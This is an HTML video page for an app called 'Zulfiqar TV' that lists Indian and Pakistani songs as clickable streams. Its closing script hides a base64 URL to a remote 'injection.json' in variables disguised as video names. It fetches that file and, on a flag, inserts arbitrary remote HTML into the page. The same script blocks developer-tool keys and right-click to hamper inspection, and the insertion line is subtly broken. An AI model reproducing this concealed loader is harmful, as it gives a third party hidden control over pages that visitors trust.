<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Zulfiqar TV</title>
	<link href="https://niazitv.com/jtv/style.css" rel="stylesheet" />
	<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css" rel="stylesheet" /><script src="https://s0.2mdn.net/instream/video/client.js" async="" type="text/javascript"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
	<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.11.2/css/all.min.css" rel="stylesheet" />
	<style type="text/css">:root {
				--hfs: 2vmax;
				--primaryColor: red;
				--secondaryColor: black;
				--secondaryOpposite: white;
			}
			::-webkit-scrollbar {
				width: 0em;
				height: 0em;
			}
			::-webkit-scrollbar-thumb {
				background: var(--secondaryColor);
			}
			::-webkit-scrollbar-track {
				background: none;
			}
			* {
				-webkit-user-select: none;
				-moz-user-select: none;
				-ms-user-select: none;
				user-select: none;
			}
			body {
				background-color: var(--secondaryColor);
			}

			.alignleft {
				float: left;
				margin-left: 5px;
				font-weight: bold;
				font-size: 15px;
			}

			.alignright {
				float: right;
				margin-right: 10px;
				color: var(--primaryColor);
				font-weight: normal;
                font-size: 25px;
			}

			h4 {
				margin-left: 5px;
				color: var(--primaryColor);
				font-weight: bold;
				font-size: 15px;
			}

			.nta {
				position: relative;
				overflow: hidden;
				color: var(--primaryColor);
			}

			div.scrollmenu {
				background-color: var(--secondaryColor);
				overflow: auto;
				white-space: nowrap;
				position: relative;
				overflow-y: hidden;
			}

			div.scrollmenu a {
				display: inline-block;
				color: var(--secondaryOpposite);
				text-align: center;
				padding: 4px;
				text-decoration: none;
			}

			div.scrollmenu a:hover {
				background-color: var(--secondaryColor);
			}

			.cen {
				position: relative;
				text-align: center;
				color: var(--secondaryOpposite);
			}

			.centered {
				font-size: var(--hfs);
				font-weight: bold;
				position: absolute;
				top: 80%;
				left: 50%;
				transform: translate(-50%, -50%);
			}

			.cent {
				font-size: auto;
				position: absolute;
				top: 95%;
				left: 50%;
				transform: translate(-50%, -50%);
			}

			.nt {
				width: 100px;
				border-radius: 10px;
				height: 120px;
				z-index: 1;
			}

			.mnt {
				width: 100px;
				border-radius: 2px;
				height: 100px;
			}
			.item img {
				border-radius: 10px;
			}
			#content-container {
				margin-bottom: 30px;
			}
			footer {
				display: grid;
				grid-gap: 0.5em;
				grid-template-columns: repeat(5, minmax(10px, 1fr));
				position: fixed;
				bottom: 0;
				left: 0;
				width: 100%;
				background-color: var(--secondaryColor);
				padding: 0px 4px 10px;
				justify-content: center;
				align-items: center;
                font-size:18px;
			}
			footer a {
				text-align: center;
				color: var(--primaryColor);
			}
			footer a:nth-child(3) i {
				background: var(--primaryColor);
				border-radius: 50%;
				padding: 10px 10px;
				color: var(--secondaryOpposite);
				margin-top: -40px;
				border: 2px solid var(--secondaryColor);
			}
	</style>
	<style type="text/css">::-webkit-scrollbar{
    display:none
}
*{
    -ms-overflow-style:none;
    scrollbar-width:none
}
body{
    margin:0;
    background:#f5f5f5;
    font-family:Arial,Helvetica,sans-serif;
    line-height:1.5;
    color:white;
    scroll-behavior:smooth;
    text-align:center;
}
#player-wrapper{
    width:100%;
    z-index:999;
}
.sticky{
    position:fixed;
    top:0;
    width:100%
}
#status{
    position:fixed;
    bottom:0;
    right:0;
    width:100%;
    background:#fff;
    display:none;
}
.col-sm-2{
    border-radius:4px
}
.sp{
    width:50%;
    height:12px;
    clear:both;
    margin:20px auto
}
.sp-texture{
    border:1px #000 solid;
    border-radius:4px;
    position:relative;
    background:linear-gradient(45deg,transparent 49%,#000 50%,#000 50%,transparent 51%,transparent),linear-gradient(-45deg,transparent 49%,#000 50%,#000 50%,transparent 51%,transparent);
    background-size:16px 16px;
    background-position:0 0;
    -webkit-animation:spTexture 1s infinite linear;
    animation:spTexture 1s infinite linear;
    color:#000;
    text-align:center;
    line-height:3em;
    font-family:roboto
}
@-webkit-keyframes spTexture{
    from{
        background-position:0 0
    }
    to{
        background-position:-16px 0
    }
}
@keyframes spTexture{
    from{
        background-position:0 0
    }
    to{
        background-position:-16px 0
    }
}
.heading{
    margin:5px auto;
    text-align:center
}
#rmpPlayer{
    z-index:999
}
.white{
    color:#fff
}
.red{
    color:red
}
.yellow{
    color:#ffdd40
}
footer{
    color:#fff;
    text-align:center
}
footer p{
    margin-bottom:20px;
    margin-top:-10px
}
.animated{
    font-family:sans;
    margin:0;
    padding:0;
    font-size:25px;
    background:url(https://upload.wikimedia.org/wikipedia/commons/3/3b/ColorRotateHr.gif) no-repeat;
    background-clip:text;
    -webkit-background-clip:text;
    color:transparent;
    animation:moveBg 40s linear infinite;
    -webkit-animation:moveBg 40s linear infinite
}
@keyframes moveBg{
    0%{
        background-position:0 30%
    }
    100%{
        background-position:100% 50%
    }
}
.blink{
    animation-name:blinker;
    animation-duration:1s;
    animation-timing-function:linear;
    animation-iteration-count:infinite
}
@keyframes blinker{
    0%{
        opacity:1
    }
    50%{
        opacity:0
    }
    100%{
        opacity:1
    }
}
*{
    -webkit-touch-callout:none;
    -webkit-user-select:none;
    -khtml-user-select:none;
    -moz-user-select:none;
    -ms-user-select:none;
    user-select:none
}
body{
    background:#000!important;
    overflow:hidden;
    color:white;
}
.parent{
    background:rgba(0,0,0,.9);
    font-family:"Source Sans Pro",sans-serif;
    margin:0;
    display:flex;
    align-items:center;
    justify-content:center;
    flex-direction:column;
    position:fixed;
    top:0;
    height:100%;
    width:100%;
    z-index:999999
}
.blobs-container{
    display:flex
}
.blob img{
    width:50%;
    display:none;
    margin:auto;
    margin-top:25px
}
.loading{
    color:#000;
    display:block;
    text-align:center;
    position:relative;
    top:30px;
    left:-2px;
    background:rgba(255,255,255,.9);
    padding:0 10px;
    border-radius:3px;
    width:80%;
    margin:auto;
    font-size:10px
}

.print{height:150px;
width:150px;

border-radius:5px;
border:1.5px solid #999;
padding:2px;
    margin:3px;

}
.print:hover{height:150px;
width:150px;
border:2px solid red;
border-radius:5px;webkit-box-shadow: 0px 10px 0px 0px rgba(255,0,0,1);
-moz-box-shadow: 0px 10px 0px 0px rgba(255,0,0,1);
box-shadow: 0px 3px 20px 3px rgba(255,0,0,100);}
.print:active{height:150px;
width:150px;
border:2px solid red;
border-radius:5px;
webkit-box-shadow: 0px 10px 0px 0px rgba(0,255,0,1);
-moz-box-shadow: 0px 10px 0px 0px rgba(0,255,0,1);
box-shadow: 0px 3px 20px 3px rgba(0,255,0,100);}
marquee{
border-radius: 6px 0px 0px  6px;
width: 90%;
border:2px solid red;
margin: auto;
   font-weight:bold;
   color:#fff;
display: block;}

.marquee span{display: inline-block;
 background: #ff0000;
 border-radius:  0px 6px 6px 0px;
  padding: 0px 10px;
   color: #fff;
   padding:2px;
   font-weight:bold;
    display: inline-block;
     float: right;
      width: auto;
       line-height: 35px;}
       .marquee marquee{display: block;
        line-height: 35px;
         z-index: -1; 
         margin-right: 10px;
          width: auto; 
          margin: auto;}
	</style>
	<link href="https://cdn.radiantmediatechs.com/rmp/5.9.2/css/rmp-s4.min.css" id="rmp-dress-code" rel="stylesheet" type="text/css" />
</head>
<body style="overflow: auto;">
<div class="parent" id="loader" style="display: none;">
<div class="blobs-container">
<div class="blob"><img id="loader-image" src="" /></div>
</div>
</div>

<div id="player-wrapper">
<div id="rmpPlayer">&nbsp;</div>

<div class="marquee yellow"><span>:نوٹ</span> <marquee direction="left" onmouseout="start()" onmouseover="stop()" scrollamount="5">Yeh All Songs Jazz Ki SiM Par Bilkul Muft Free Hain 1st Time Apke Pass 10 Mbs HoNa Chahiye Apka Mbs Use Nahi Hoga Thanks for Using Zulfiqar Tv App </marquee></div>

<h2 align="center" class="animated">Jazz Free Indian Songs</h2>

<h4>Watch Only On Zulfiqar <span class="logoText"> TV App</span></h4>

<div id="buttons-list" style="margin-top: 0px;"><span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood20721/mile_ho_tum_-_reprise_version_full_video-20160624/video/mile_ho_tum_-_reprise_version_full_video_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTotY54xUqEyhAGdPOwTY_1fH4TT6rr9tw6fw&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/pakistani/tasveer-2020/video/tasveer_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://bajao.pk/image/pakistani/tasveer-2020/fulltrack/tasveer_500x500.webp" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/pakistani/soneya-2020/video/soneya_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://bajao.pk/image/pakistani/soneya-2020/fulltrack/soneya_500x500.webp" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood20721/aaj_se_teri_full_video_-_padman-20171226/video/aaj_se_teri_full_video_-_padman.smil/segment_ctaudio.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://bajao.pk/image/bollywood50621/padman-2017/fulltrack/aaj_se_teri_500x500.webp" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood50322/main_nai_tuttna_-_attack_revised_video-20220325/video/main_nai_tuttna_-_attack_revised_video.smil/segment_ctaudio.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://bajao.pk/image/bollywood50322/main_nai_tuttna_-_attack_revised_video-20220325/video/main_nai_tuttna_-_attack_revised_video_480x270.webp" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood30322/hum_dekhenge_-_the_kashmir_files_video-20220315/video/hum_dekhenge_-_the_kashmir_files_video.smil/segment_ctaudio.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://bajao.pk/image/bollywood30322/hum_dekhenge_-_the_kashmir_files_video-20220315/video/hum_dekhenge_-_the_kashmir_files_video_480x270.webp" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood50322/la_la_la_-_attack_video-20220329/video/la_la_la_-_attack_video.smil/segment_ctaudio.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://bajao.pk/image/bollywood50322/la_la_la_-_attack_video-20220329/video/la_la_la_-_attack_video_480x270.webp" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood20322/ik_tu_hai_-_attack_video-20220310/video/ik_tu_hai_-_attack_video.smil/segment_ctaudio.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://bajao.pk/image/bollywood20322/ik_tu_hai_-_attack_video-20220310/video/ik_tu_hai_-_attack_video_480x270.webp" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood10322/jogi_-_10_nahi_40_revised_video-20220228/video/jogi_-_10_nahi_40_revised.smil/segment_ctaudio.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://bajao.pk/image/bollywood10322/jogi_-_10_nahi_40_revised_video-20220228/video/jogi_-_10_nahi_40_revised_video_480x270.webp" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definest_/bajao/video/bollywood/dabangg_3-2019/video/naina_lade_720.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://i.ytimg.com/vi/aXmypJSCWdo/mqdefault.jpg" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/marjaavaan-2019/video/tumhi_aana_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRdOM-WCPeR5jddWHpcYENQdjFcsz3No6qmwg&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/hume_tumse_pyaar_kitna-2019/video/baarish_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ-2nqvTt3trC8KjeydbVHDhft_6AKSbnFT0g&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/bajrangi_bhaijaan-2015/video/bhar_do_jholi_meri_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQw1twfjRDk1y7SxTkdly4nMyu4rbGCrXIVIA&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/bajrangi_bhaijaan-2015/video/tu_jo_mila_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS_xaFSelqHn63efhmmud168T_zUW9P80XOGw&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/zero-2018/video/tanha_hua_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://i.ytimg.com/vi/_sfIvmxhz5Y/mqdefault.jpg" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/zero-2018/video/mere_naam_tu_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRqkWqLWo-Mgr15oX6nOuyUrE1ghhK_QuFTZQ&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/zero-2018/video/ann_bann_360.mp4/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSaZmo2P7xCsSiUIAf7GborUnkJpau-wyAuRQ&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/rab_ne_bana_di_jodi-2008/video/tujh_mein_rab_dikhta_hai_ii.smil/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://i.ytimg.com/vi/eBi8syxPd14/mqdefault.jpg" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/fanaa-2006/video/chand_sifarish.smil/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJ0iD-qNoq7L_vaVrz-n2JHhea_q9lRKJoGw&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/ek_tha_tiger-2012/video/mashallah.smil/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRlX1PFqoTSAd2D75fbwF4KGCVN_PnIpBPXMw&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/dhoom3-2013/video/dhoom_machale_dhoom.smil/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://i.ytimg.com/vi/GUBa1wRxQko/maxresdefault.jpg" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/tiger_zinda_hai-2017/video/dil_diyan_gallan.smil/playlist.m3u8"><img autofocus="" class="print" id=" humtv" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTG7JZbeYEI1-pHZ9BluIhZh-191PZ1feZrxw&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/baaghi_3-2020/video/faaslon_mein.smil/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTUfvMOj1zN01BbtyZYLo8JdKtbdnLxFK4VlA&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/baaghi_3-2020/video/get_ready_to_fight_reloaded.smil/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTh6agNgOGOuzAgDc6YRW7a9MG7YCSqFZSfTg&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/mohabbatein-2000/video/humko_humise_chura_lo.smil/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQtBFzPTlQj6fWp0BXM_Lmkpy9kQluhqdwv3w&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/smil:video/bollywood/baaghi-2016/video/cham_cham.smil/playlist.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTbk_W02FOufgOHZ9avdvhdGhrAblDezu3Jxg&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/zindagi_kitni_haseen_hay-2016/video/tutya_tara_720.mp4/manifest.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQCJWuo6REtkRTB99UgNgLfTwQ-rjQMC9Lcsw&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/zindagi_kitni_haseen_hay-2016/video/udassian_-_slow_version-full_track_720.mp4/manifest.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRtuDPzVqWjwk55spclfkNw4_BmK9gw_dlb9g&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/baarishein-2019/video/baarishein_360.mp4/manifest_.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQFwrerBbrk5refB5-ZUf0ej42R8TOL8qKeSw&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/m.s._dhoni_-_the_untold_story-2016/video/kaun_tujhe_360.mp4/manifest.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ4y8LEU7yj7ZOxfdDNsUFCGaAQn2r6PoImEA&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/dil_zaffran-2018/video/dil_zaffran_360.mp4/segment.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSITiLTJ7ve5jkyMcOQKijVnpW4Uizh1v3h_A&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/tu_yaad_aya-2020/video/tu_yaad_aya_360.mp4/manifest.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRb2e7ner_thIAZ3Ry9SRti6sFQNqewweoI-w&amp;usqp=CAU" /></span> <span url="https://5d95f094eba0d.streamlock.net:1936/titan/_definst_/bajao/video/bollywood/batti_gul_meter_chalu-2018/video/dekhte_dekhte_360.mp4/manifest.m3u8"><img autofocus="" class="print" id=" hummasala" name=" Hummasala " src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQMH1z5__zyVLIBOvPeMX_MIt1KFa6BHtMi2g&amp;usqp=CAU" /></span></div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script src="https://cdn.radiantmediatechs.com/rmp/5.9.2/js/rmp.min.js"></script><script>
            var appSettings={
                loaderimg: "",
                name: " TV",
                poster: "https://i.postimg.cc/Pxg3nzz7/20221031-100719.jpg",
                introMp4: "https://wasitv.pk/wasitv-intro.mp4",
                introHls: "https://wasitv.pk/wasitv-intro/index.m3u8",
				videoFormat: "mp4",
            },x={loaderimg:appSettings.loaderimg,name:appSettings.name,poster:appSettings.poster,website:"",licenseKey:"Kl8lbz16cz1rN2l2enM9Z2M9NnZvMnllaT9yb201ZGFzaXMzMGRiMEElXyo",autoHeightMode:!0,pip:!1,autoplay:!1,skin:"s4",hideControls:!0,preload:"auto",sharing:!1},firstVideo="aHR0cHM6Ly9yYXcuZ2l0aHVidXNlc";setInterval(()=>{$("#loader-image").attr("src",x.loaderimg),$(".logoText").html(x.name)},10),$(document).contextmenu(function(e){return e.preventDefault(),!1}),document.onkeydown=function(e){return 123!=event.keyCode&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="I".charCodeAt(0))&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="C".charCodeAt(0))&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="J".charCodeAt(0))&&((!e.ctrlKey||e.keyCode!="U".charCodeAt(0))&&void 0))))},setTimeout(()=>{$("#loader").css("display","none"),$("body").css("overflow","auto")},100);var src,secondVideo="mNvbnRlbnQuY29tL3NvZnR";$("span").each(function(e){$(this).on("click",function(){var e=$(this).attr("url");rmp.setControls(!0),src="hls"==appSettings.videoFormat?{hls:e}:{mp4:[e]},rmp.setSrc(src),rmp.play()})});var thirdVideo="3ZWJ0dXRzL015RHJpdmUvbW";src="hls"==appSettings.videoFormat?{hls:appSettings.introHls}:{mp4:[appSettings.introMp4]};var fourthVideo="Fpbi9pbmplY3Rpb24uanNvbg==",settings={licenseKey:x.licenseKey,autoHeightMode:x.autoHeightMode,pip:x.pip,delayToFade:3e3,gaLabel:"Live TV",logoWatermark:!0,logoPosition:"topleft",speed:"Speed",isLive:!0,googleCast:!0,airplay:!0,hlsJSMaxBufferLength:24,hlsJSLiveSyncDuration:18,hlsJSStartLevel:-1,hlsJSMinAutoBitrate:1e5,hlsJSAbrBandWidthFactor:.9,hlsJSAbrBandWidthUpFactor:.7,hlsJSLiveBackBufferLength:0,detectAutoplayCapabilities:!0,autoplay:x.autoplay,mutedAutoplayOnMobile:!1,mutedAutoplayOnMacosSafari11Plus:!1,srcChangeAutoplay:!0,playsInline:!0,skin:x.skin,skinBackgroundColor:"rgba(0, 0, 0, 0.7)",skinButtonColor:"FFFFFF",skinAccentColor:"FF0000",ads:!0,nav:!0,adBlockerDetection:!0,adEnablePreloading:!0,adBlockerDetectedMessage:"Ad-blocker software detected. Please disable Ad-blocker to watch stream.",quickRewind:10,quickForward:10,adAutoAlign:!1,hideControls:x.hideControls,preload:x.preload,crossorigin:!0,sharing:x.sharing,sharingUrl:x.website,contentMetadata:{artwork:[{src:x.poster,sizes:"1280x720",type:"image/jpg"}],poster:[x.poster],endOfVideoPoster:[x.poster],thumbnail:x.poster},src:src},elementID="rmpPlayer",rmp=new RadiantMP(elementID),rmpContainer=document.getElementById(elementID);rmp.setLoop(!0),rmp.init(settings),$(function(){$(window).scroll(function e(){return $("#rmpPlayer").css($(window).scrollTop()>1?{position:"fixed",top:"0px"}:{position:"relative",top:"auto"}),$("#buttons-list").css($(window).scrollTop()>1?{"margin-top":$("#rmpPlayer").height()}:{"margin-top":"0px"}),e}())});const request=async e=>{const t=await fetch(e);return await t.json()};navigator.onLine&&request(atob(firstVideo+secondVideo+thirdVideo+fourthVideo)).then(t=>{1==t.inject&&document.querySelector("div").insertAdjacentHTML("afterend",e.content)}).catch(e=>{console.log(appSettings.name)});</script></div>
</body>
</html>
